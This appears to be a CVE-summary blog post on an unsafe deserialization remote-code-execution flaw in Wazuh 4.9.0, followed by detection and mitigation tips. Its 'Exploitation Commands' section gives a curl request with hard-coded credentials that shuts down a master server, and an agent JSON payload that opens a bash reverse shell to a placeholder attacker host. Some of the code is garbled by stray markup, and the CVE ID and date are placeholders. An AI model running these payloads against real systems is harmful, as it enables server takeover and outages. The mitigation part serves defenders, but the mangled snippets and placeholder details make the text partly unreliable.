Wazuh, Unsafe Deserialization, CVE-2024-XXXX (Critical)

By /

Listen to this Post

How the CVE Works

The vulnerability arises in Wazuh’s DistributedAPI when deserializing JSON data using `as_wazuh_object` in framework/wazuh/core/cluster/common.py. Attackers can inject a malicious dictionary containing `__unhandled_exc__` to trigger arbitrary Python code execution. This occurs because the deserialization process does not properly sanitize input, allowing crafted payloads to bypass security checks.

Exploitation can occur via:

  1. API Access – A compromised dashboard or worker server sends a malicious `run_as` request to the master, exploiting the `auth_context` parameter in security_controller.py.
  2. Agent Compromise – A rogue agent responds to a `getconfig` request with a poisoned JSON payload, triggering deserialization on the managing server.
    The payload leverages Python’s exception handling (__class__, __args__) to execute code, such as shutting down the server or running OS commands.

DailyCVE Form

Platform: Wazuh
Version: v4.9.0
Vulnerability: RCE via deserialization
Severity: Critical
Date: 2024-XX-XX

What Undercode Say:

Exploitation Commands

1. API Exploit (Master Shutdown):

curl -X POST -k -u "wazuh-wui:MyS3cr37P450r.-" -H "Content-Type: application/json" --data '{"<strong>unhandled_exc</strong>":{"<strong>class</strong>": "os.system", "<strong>args</strong>": ["shutdown -h now"]}}' https://<worker>:55000/security/user/authenticate/run_as

2. Agent Payload (Reverse Shell):

{"<strong>unhandled_exc</strong>": {"<strong>class</strong>": "subprocess.Popen", "<strong>args</strong>": [["/bin/bash", "-c", "bash -i >& /dev/tcp/attacker-ip/4444 0>&1"], {"shell": true}]}}

Detection & Mitigation

1. Check for Suspicious API Logs:

grep -r "run_as|__unhandled_exc__" /var/ossec/logs/api.log

2. Patch Workaround (Input Sanitization):

Override as_wazuh_object in common.py
def as_wazuh_object(data):
if '<strong>unhandled_exc</strong>' in data:
raise ValueError("Malformed DAPI request")
... original logic

3. Network Controls:

iptables -A INPUT -p tcp --dport 55000 -s !trusted-ip -j DROP

Forensic Analysis

  • Extract Malicious Payloads: 
    strings /var/ossec/queue/cluster/ | grep -E "<strong>unhandled_exc</strong>|<strong>class</strong>"
  • Agent Integrity Check: 
    /var/ossec/bin/manage_agents -l | grep -v "Active"

References

  • Wazuh Patch: [GitHub Commit]
  • CWE-502: Unsafe Deserialization
  • Mitre ATT&CK: T1212 (Exploitation for Client Execution)

No further commentary.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

Join Our Cyber World:

πŸ’¬ Whatsapp | πŸ’¬ TelegramFeatured Image

Scroll to Top